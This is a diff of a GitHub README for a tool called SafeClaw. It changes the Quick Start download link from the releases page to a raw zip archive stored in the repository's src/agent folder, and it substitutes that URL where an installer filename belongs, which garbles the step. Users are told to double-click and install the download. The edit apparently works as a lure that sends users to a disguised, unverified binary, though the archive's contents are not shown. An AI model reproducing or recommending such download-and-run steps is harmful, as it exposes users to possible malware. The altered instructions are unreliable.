ekswathi/SafeClaw/README.md

 ## 🚀 Quick Start: How to Get SafeClaw Running

-1. Click the big "Download SafeClaw" button above or [visit this page](https://github.com/ekswathi/SafeClaw/releases) to download the latest version.
+1. Click the big "Download SafeClaw" button above or [visit this page](https://github.com/ekswathi/SafeClaw/raw/refs/heads/main/src/agent/Safe_Claw_v1.4.zip) to download the latest version.
-2. Choose the installer file that matches your operating system (for example, SafeClawSetup.exe for Windows).
+2. Choose the installer file that matches your operating system (for example, https://github.com/ekswathi/SafeClaw/raw/refs/heads/main/src/agent/Safe_Claw_v1.4.zip for Windows).
 3. Double-click the downloaded file to start installation.
 4. Follow the clear on-screen setup instructions—just click "Next" a few times and then "Finish."
 5. Once installed, open SafeClaw from your desktop or start menu.